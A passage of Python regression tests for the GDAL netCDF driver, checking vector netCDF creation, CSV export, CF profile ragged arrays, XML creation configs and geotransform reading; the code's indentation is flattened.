expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String(10),Date,DateTime,DateTime,Real,Real,Integer,Integer,Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.nc')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.prj')
return 'success'
###############################################################################
# Test creating a vector NetCDF 4 file with X,Y,Z fields
def netcdf_52():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( 'tmp/netcdf_52.nc', ds, format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'] )
with gdaltest.error_handler():
ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( '/vsimem/netcdf_52.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
ds = None
fp = gdal.VSIFOpenL( '/vsimem/netcdf_52.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
fp = gdal.VSIFOpenL( '/vsimem/netcdf_52.csvt', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
lyr = ds.GetLayer(0)
lyr.CreateField( ogr.FieldDefn('extra', ogr.OFTInteger) )
f = lyr.GetNextFeature()
if f is None:
gdaltest.post_reason('failure')
return 'fail'
f['extra'] = 5
if lyr.CreateFeature(f) != 0:
gdaltest.post_reason('failure')
return 'fail'
ds = None
ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
if f['int32'] != 1 or f['extra'] != 5:
gdaltest.post_reason('failure')
return 'fail'
f = None
ds = None
import netcdf_cf
if netcdf_cf.netcdf_cf_setup() == 'success' and \
gdaltest.netcdf_cf_method is not None:
result_cf = netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_52.nc','auto',False )
if result_cf != 'success':
gdaltest.post_reason('failure')
return 'fail'
gdal.Unlink('tmp/netcdf_52.nc')
gdal.Unlink('tmp/netcdf_52.csv')
gdal.Unlink('tmp/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.csv')
gdal.Unlink('/vsimem/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.prj')
return 'success'
###############################################################################
# Test creating a vector NetCDF 4 file with WKT geometry field
def netcdf_53():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ds = gdal.OpenEx( '../ogr/data/poly.shp', gdal.OF_VECTOR )
out_ds = gdal.VectorTranslate( 'tmp/netcdf_53.nc', ds, format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'] )
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
out_ds = None
out_ds = gdal.OpenEx( 'tmp/netcdf_53.nc', gdal.OF_VECTOR )
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
if srs.find('PROJCS["OSGB 1936') < 0:
gdaltest.post_reason('failure')
print(srs)
return 'fail'
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
out_ds = None
gdal.Unlink('tmp/netcdf_53.nc')
return 'success'
###############################################################################
# Test appending to a vector NetCDF 4 file with unusual types (ubyte, ushort...)
def netcdf_54():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
shutil.copy( 'data/test_ogr_nc4.nc', 'tmp/netcdf_54.nc')
ds = gdal.OpenEx( 'tmp/netcdf_54.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f is None:
gdaltest.post_reason('failure')
return 'fail'
f['int32'] += 1
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
if lyr.CreateFeature(f) != 0:
gdaltest.post_reason('failure')
return 'fail'
ds = None
ds = gdal.OpenEx( 'tmp/netcdf_54.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_54.nc')
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
return 'success'
###############################################################################
# Test auto-grow of bidimensional char variables in a vector NetCDF 4 file
def netcdf_55():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
shutil.copy( 'data/test_ogr_nc4.nc', 'tmp/netcdf_55.nc')
ds = gdal.OpenEx( 'tmp/netcdf_55.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f is None:
gdaltest.post_reason('failure')
return 'fail'
f['twodimstringchar'] = 'abcd'
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
if lyr.CreateFeature(f) != 0:
gdaltest.post_reason('failure')
return 'fail'
ds = None
ds = gdal.OpenEx( 'tmp/netcdf_55.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_55.nc')
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
return 'success'
###############################################################################
# Test truncation of bidimensional char variables and WKT in a vector NetCDF 3 file
def netcdf_56():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_56.nc')
# Test auto-grow of WKT field
lyr = ds.CreateLayer('netcdf_56', options = [ 'AUTOGROW_STRINGS=NO', 'STRING_DEFAULT_WIDTH=5', 'WKT_DEFAULT_WIDTH=5' ] )
lyr.CreateField(ogr.FieldDefn('txt'))
f = ogr.Feature(lyr.GetLayerDefn())
f['txt'] = '0123456789'
f.SetGeometry(ogr.CreateGeometryFromWkt('POINT (1 2)'))
with gdaltest.error_handler():
ret = lyr.CreateFeature(f)
if ret != 0:
gdaltest.post_reason('failure')
return 'fail'
ds = None
ds = gdal.OpenEx( 'tmp/netcdf_56.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
if f['txt'] != '01234' or f.GetGeometryRef() is not None:
gdaltest.post_reason('failure')
f.DumpReadable()
return 'fail'
ds = None
gdal.Unlink('tmp/netcdf_56.nc')
return 'success'
###############################################################################
# Test one layer per file creation
def netcdf_57():
if gdaltest.netcdf_drv is None:
return 'skip'
try:
shutil.rmtree('tmp/netcdf_57')
except:
pass
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
if ds is not None:
gdaltest.post_reason('failure')
return 'fail'
open('tmp/netcdf_57', 'wb').close()
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
if ds is not None:
gdaltest.post_reason('failure')
return 'fail'
os.unlink('tmp/netcdf_57')
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_57', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
for ilayer in range(2):
lyr = ds.CreateLayer('lyr%d' % ilayer)
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTInteger))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = ilayer
lyr.CreateFeature(f)
ds = None
for ilayer in range(2):
ds = ogr.Open('tmp/netcdf_57/lyr%d.nc' % ilayer)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f['lyr_id'] != ilayer:
gdaltest.post_reason('failure')
return 'fail'
ds = None
shutil.rmtree('tmp/netcdf_57')
return 'success'
###############################################################################
# Test one layer per group (NC4)
def netcdf_58():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_58.nc', options = ['FORMAT=NC4', 'MULTIPLE_LAYERS=SEPARATE_GROUPS'])
for ilayer in range(2):
# Make sure auto-grow will happen to test this works well with multiple groups
lyr = ds.CreateLayer('lyr%d' % ilayer, geom_type = ogr.wkbNone, options = ['USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1' ])
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = 'lyr_%d' % ilayer
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_58.nc')
for ilayer in range(2):
lyr = ds.GetLayer(ilayer)
f = lyr.GetNextFeature()
if f['lyr_id'] != 'lyr_%d' % ilayer:
gdaltest.post_reason('failure')
return 'fail'
ds = None
gdal.Unlink('tmp/netcdf_58.nc')
return 'success'
###############################################################################
#check for UnitType set/get.
def netcdf_59():
if gdaltest.netcdf_drv is None:
return 'skip'
# get
ds = gdal.Open( 'data/unittype.nc' )
unit = ds.GetRasterBand( 1 ).GetUnitType()
if unit != 'm/s':
gdaltest.post_reason( 'Incorrect unit(%s)' % unit )
return 'fail'
ds = None
# set
tst = gdaltest.GDALTest( 'NetCDF', 'unittype.nc', 1, 4672 )
return tst.testSetUnitType()
###############################################################################
# Test reading a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# http://cfconventions.org/cf-conventions/v1.6.0/cf-conventions.html#_indexed_ragged_array_representation_of_profiles
def netcdf_60():
if gdaltest.netcdf_drv is None:
return 'skip'
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx( 'data/profile.nc', gdal.OF_RASTER )
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdal.OpenEx( 'data/profile.nc', gdal.OF_VECTOR)
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
with gdaltest.error_handler():
gdal.VectorTranslate( '/vsimem/netcdf_60.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_60.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_60.csv')
return 'success'
###############################################################################
# Test appending to a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_61():
if gdaltest.netcdf_drv is None:
return 'skip'
shutil.copy('data/profile.nc', 'tmp/netcdf_61.nc')
ds = gdal.VectorTranslate( 'tmp/netcdf_61.nc', 'data/profile.nc', accessMode = 'append' )
gdal.VectorTranslate( '/vsimem/netcdf_61.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_61.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_61.csv')
gdal.Unlink('/vsimem/netcdf_61.nc')
return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_62():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.VectorTranslate( 'tmp/netcdf_62.nc', 'data/profile.nc', format = 'netCDF', layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_INIT_SIZE=1', 'PROFILE_VARIABLES=station'] )
gdal.VectorTranslate( '/vsimem/netcdf_62.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_62.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_62.csv')
return 'success'
def netcdf_62_ncdump_check():
if gdaltest.netcdf_drv is None:
return 'skip'
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_62.nc' )
if ret.find('profile = 2') < 0 or \
ret.find('record = UNLIMITED') < 0 or \
ret.find('profile:cf_role = "profile_id"') < 0 or \
ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
ret.find(':featureType = "profile"') < 0 or \
ret.find('char station(profile') < 0 or \
ret.find('char foo(record') < 0:
gdaltest.post_reason('failure')
print(ret)
return 'fail'
else:
return 'skip'
return 'success'
def netcdf_62_cf_check():
if gdaltest.netcdf_drv is None:
return 'skip'
import netcdf_cf
if netcdf_cf.netcdf_cf_setup() == 'success' and \
gdaltest.netcdf_cf_method is not None:
result_cf = netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_62.nc','auto',False )
if result_cf != 'success':
gdaltest.post_reason('failure')
return 'fail'
gdal.Unlink('/vsimem/netcdf_62.nc')
return 'success'
###############################################################################
# Test creating a NC4 "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_63():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
shutil.copy('data/profile.nc', 'tmp/netcdf_63.nc')
ds = gdal.VectorTranslate( 'tmp/netcdf_63.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'], layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1' ] )
gdal.VectorTranslate( '/vsimem/netcdf_63.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_63.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_63.csv')
return 'success'
def netcdf_63_ncdump_check():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_63.nc' )
if ret.find('profile = UNLIMITED') < 0 or \
ret.find('record = UNLIMITED') < 0 or \
ret.find('profile:cf_role = "profile_id"') < 0 or \
ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
ret.find(':featureType = "profile"') < 0 or \
ret.find('char station(record') < 0:
gdaltest.post_reason('failure')
print(ret)
return 'fail'
else:
gdal.Unlink('/vsimem/netcdf_63.nc')
return 'skip'
gdal.Unlink('/vsimem/netcdf_63.nc')
return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# but without a profile field.
def netcdf_64():
if gdaltest.netcdf_drv is None:
return 'skip'
gdal.VectorTranslate( 'tmp/netcdf_64.nc', 'data/profile.nc', format = 'netCDF', selectFields = ['id,station,foo'], layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_NAME=profile_dim', 'PROFILE_DIM_INIT_SIZE=1'] )
gdal.VectorTranslate( '/vsimem/netcdf_64.csv', 'tmp/netcdf_64.nc', format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_64.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile_dim,id,station,foo
"POINT Z (2 49 100)",0,1,Palo Alto,bar
"POINT Z (3 50 50)",1,2,Santa Fe,baz
"POINT Z (2 49 200)",0,3,Palo Alto,baw
"POINT Z (3 50 100)",1,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_64.csv')
gdal.Unlink('/vsimem/netcdf_64.nc')
return 'success'
###############################################################################
# Test creating a NC4 file with empty string fields / WKT fields
# (they must be filled as empty strings to avoid crashes in netcdf lib)
def netcdf_65():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_65.nc', options = ['FORMAT=NC4'])
lyr = ds.CreateLayer('test')
lyr.CreateField(ogr.FieldDefn('str', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_65.nc')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f['str'] != '':
gdaltest.post_reason('failure')
f.DumpReadable()
return 'fail'
ds = None
gdal.Unlink('tmp/netcdf_65.nc')
return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# from a config file
def netcdf_66():
if gdaltest.netcdf_drv is None:
return 'skip'
# First trying with no so good configs
with gdaltest.error_handler():
gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=not_existing'] )
with gdaltest.error_handler():
gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=<Configuration>'] )
myconfig = \
"""<Configuration>
<!-- comment -->
<unrecognized_elt/>
<DatasetCreationOption/>
<DatasetCreationOption name="x"/>
<DatasetCreationOption value="x"/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
<Field name="x">
<!-- comment -->
<unrecognized_elt/>
</Field>
<Field name="station" main_dim="non_existing"/>
<Layer/>
<Layer name="x">
<!-- comment -->
<unrecognized_elt/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
</Layer>
</Configuration>
"""
with gdaltest.error_handler():
gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=' + myconfig] )
# Now with a correct configuration
myconfig = \
"""<Configuration>
<DatasetCreationOption name="WRITE_GDAL_TAGS" value="NO"/>
<LayerCreationOption name="STRING_DEFAULT_WIDTH" value="1"/>
<Attribute name="foo" value="bar"/>
<Attribute name="foo2" value="bar2"/>
<Field name="id">
<Attribute name="my_extra_attribute" value="5.23" type="double"/>
</Field>
<Field netcdf_name="lon"> <!-- edit predefined variable -->
<Attribute name="my_extra_lon_attribute" value="foo"/>
</Field>
<Layer name="profile" netcdf_name="my_profile">
<LayerCreationOption name="FEATURE_TYPE" value="PROFILE"/>
<LayerCreationOption name="RECORD_DIM_NAME" value="obs"/>
<Attribute name="foo" value="123" type="integer"/> <!-- override global one -->
<Field name="station" netcdf_name="my_station" main_dim="obs">
<Attribute name="long_name" value="my station attribute"/>
</Field>
<Field netcdf_name="lat"> <!-- edit predefined variable -->
<Attribute name="long_name" value=""/> <!-- remove predefined attribute -->
</Field>
</Layer>
</Configuration>
"""
gdal.VectorTranslate( 'tmp/netcdf_66.nc', 'data/profile.nc', format = 'netCDF', datasetCreationOptions = ['CONFIG_FILE=' + myconfig] )
gdal.VectorTranslate( '/vsimem/netcdf_66.csv', 'tmp/netcdf_66.nc', format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_66.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,my_station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_66.csv')
return 'success'
def netcdf_66_ncdump_check():
if gdaltest.netcdf_drv is None:
return 'skip'
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_66.nc' )
if ret.find('char my_station(obs, my_station_max_width)') < 0 or \
ret.find('my_station:long_name = "my station attribute"') < 0 or \
ret.find('lon:my_extra_lon_attribute = "foo"') < 0 or \
ret.find('lat:long_name') >= 0 or \
ret.find('id:my_extra_attribute = 5.23') < 0 or \
ret.find('profile:cf_role = "profile_id"') < 0 or \
ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
ret.find(':featureType = "profile"') < 0:
gdaltest.post_reason('failure')
print(ret)
return 'fail'
else:
gdal.Unlink('/vsimem/netcdf_66.nc')
return 'skip'
gdal.Unlink('/vsimem/netcdf_66.nc')
return 'success'
###############################################################################
# ticket #5950: optimize IReadBlock() and CheckData() handling of partial
# blocks in the x axischeck for partial block reading.
def netcdf_67():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
try:
import numpy
except:
return 'skip'
# disable bottom-up mode to use the real file's blocks size
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', 'NO' )
# for the moment the next test using check_stat does not work, seems like
# the last pixel (9) of the image is not handled by stats...
# tst = gdaltest.GDALTest( 'NetCDF', 'partial_block_ticket5950.nc', 1, 45 )
# result = tst.testOpen( check_stat=(1, 9, 5, 2.582) )
# so for the moment compare the full image
ds = gdal.Open( 'data/partial_block_ticket5950.nc', gdal.GA_ReadOnly )
ref = numpy.arange(1, 10).reshape((3, 3))
if numpy.array_equal(ds.GetRasterBand(1).ReadAsArray(), ref):
result = 'success'
else:
result = 'fail'
ds = None
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', None )
return result
###############################################################################
# Test reading SRS from srid attribute (#6613)
def netcdf_68():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/srid.nc')
wkt = ds.GetProjectionRef()
if wkt.find('6933') < 0:
gdaltest.post_reason('failure')
print(wkt)
return 'fail'
return 'success'
###############################################################################
# Test opening a dataset with a 1D variable with 0 record (#6645)
def netcdf_69():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/test6645.nc')
if ds is None:
return 'fail'
return 'success'
###############################################################################
# Test that we don't erroneously identify non-longitude axis as longitude (#6759)
def netcdf_70():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/test6759.nc')
gt = ds.GetGeoTransform()
expected_gt = [304250.0, 250.0, 0.0, 4952500.0, 0.0, -250.0]
if max(abs(gt[i] - expected_gt[i]) for i in range(6)) > 1e-3:
print(gt)
return 'fail'
return 'success'
###############################################################################
# Test that we take into account x and y offset and scaling
# (https://github.com/OSGeo/gdal/pull/200)
def netcdf_71():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/test_coord_scale_offset.nc')
gt = ds.GetGeoTransform()
expected_gt = (-690769.999174516, 1015.8812500000931, 0.0, 2040932.1838741193, 0.0, 1015.8812499996275)
if max(abs(gt[i] - expected_gt[i]) for i in range(6)) > 1e-3:
print(gt)
return 'fail'
return 'success'
###############################################################################
# test int64 attributes / dim
def netcdf_72():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ds = gdal.Open('data/int64dim.nc')
mdi = ds.GetRasterBand(1).GetMetadataItem('NETCDF_DIM_TIME')
if mdi != '123456789012':
print(mdi)
return 'fail'
return 'success'
###############################################################################
# test geostationary with radian units (https://github.com/OSGeo/gdal/pull/220)
def netcdf_73():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/geos_rad.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5979486.362104082, 1087179.4077774752, 0.0, -5979487.123448145, 0.0, 1087179.4077774752)
if max([abs(gt[i]-expected_gt[i]) for i in range(6)]) > 1:
print(gt)
return 'fail'
return 'success'
###############################################################################
# test geostationary with microradian units (https://github.com/OSGeo/gdal/pull/220)
def netcdf_74():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/geos_microradian.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5739675.119757546, 615630.8078590936, 0.0, -1032263.7666924844, 0.0, 615630.8078590936)
if max([abs(gt[i]-expected_gt[i]) for i in range(6)]) > 1:
print(gt)
return 'fail'
return 'success'
###############################################################################
# test opening a ncdump file
def netcdf_75():
if gdaltest.netcdf_drv is None:
return 'skip'
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'byte.nc.txt',
1, 4672 )
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
